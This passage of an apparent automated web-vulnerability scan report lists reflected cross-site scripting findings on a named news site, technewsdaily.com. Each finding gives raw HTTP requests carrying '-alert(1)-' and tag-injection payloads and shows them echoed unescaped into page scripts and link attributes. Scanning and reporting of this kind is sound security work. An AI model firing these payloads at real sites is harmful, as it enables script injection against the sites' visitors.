This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms-and-conditionscef7d'-alert(1)-'918c6662efd/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/terms-and-conditionscef7d'-alert(1)-'918c6662efd/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.190. http://www.technewsdaily.com/terms-and-conditions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /terms-and-conditions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f67aa'-alert(1)-'17b9c20d2cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms-and-conditions/?f67aa'-alert(1)-'17b9c20d2cf=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40448

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/terms-and-conditions/?f67aa'-alert(1)-'17b9c20d2cf=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.191. http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /the-exciting-new-features-in-android-23-gingerbread-1758/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae4a5'-alert(1)-'983a97dd071 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /the-exciting-new-features-in-android-23-gingerbread-1758ae4a5'-alert(1)-'983a97dd071/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40510

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
xt/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758ae4a5'-alert(1)-'983a97dd071/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.192. http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /the-exciting-new-features-in-android-23-gingerbread-1758/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a78'-alert(1)-'7cbe985692f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /the-exciting-new-features-in-android-23-gingerbread-1758/?e2a78'-alert(1)-'7cbe985692f=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/?e2a78'-alert(1)-'7cbe985692f=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.193. http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /the-exciting-new-features-in-android-23-gingerbread-1758/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54673"><a>0e36f168dee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /the-exciting-new-features-in-android-23-gingerbread-1758/?54673"><a>0e36f168dee=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/?54673"><a>0e36f168dee=1/" />
...[SNIP]...

1.194. http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /top-games-get-electronic-makeover-1804/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c3b6'-alert(1)-'ac2bc6113ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /top-games-get-electronic-makeover-18045c3b6'-alert(1)-'ac2bc6113ea/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40474

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/top-games-get-electronic-makeover-18045c3b6'-alert(1)-'ac2bc6113ea/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.195. http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /top-games-get-electronic-makeover-1804/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec9b"><a>ba2ef4a497 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /top-games-get-electronic-makeover-1804/?5ec9b"><a>ba2ef4a497=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66227

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/?5ec9b"><a>ba2ef4a497=1/" />
...[SNIP]...

1.196. http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /top-games-get-electronic-makeover-1804/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1fb4'-alert(1)-'19a27fe47f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /top-games-get-electronic-makeover-1804/?f1fb4'-alert(1)-'19a27fe47f0=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/?f1fb4'-alert(1)-'19a27fe47f0=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.197. http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /trends-of-2010-as-shown-by-25-million-tweets-1797/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e7fa'-alert(1)-'8759c4c243b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends-of-2010-as-shown-by-25-million-tweets-17971e7fa'-alert(1)-'8759c4c243b/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40496

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ype="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-17971e7fa'-alert(1)-'8759c4c243b/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.198. http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /trends-of-2010-as-shown-by-25-million-tweets-1797/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13cf5'-alert(1)-'df2abc24616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends-of-2010-as-shown-by-25-million-tweets-1797/?13cf5'-alert(1)-'df2abc24616=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
e="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/?13cf5'-alert(1)-'df2abc24616=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.199. http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /trends-of-2010-as-shown-by-25-million-tweets-1797/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32491"><a>2ff2bbac124 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /trends-of-2010-as-shown-by-25-million-tweets-1797/?32491"><a>2ff2bbac124=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63090

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/?32491"><a>2ff2bbac124=1/" />
...[SNIP]...

1.200. http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /wave-of-spam-surrounds-new-harry-potter-movie-1450/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab3d1'-alert(1)-'eb49626117c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wave-of-spam-surrounds-new-harry-potter-movie-1450ab3d1'-alert(1)-'eb49626117c/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
pe="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450ab3d1'-alert(1)-'eb49626117c/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.201. http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /wave-of-spam-surrounds-new-harry-potter-movie-1450/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53950"><a>7c673f395e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wave-of-spam-surrounds-new-harry-potter-movie-1450/?53950"><a>7c673f395e9=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
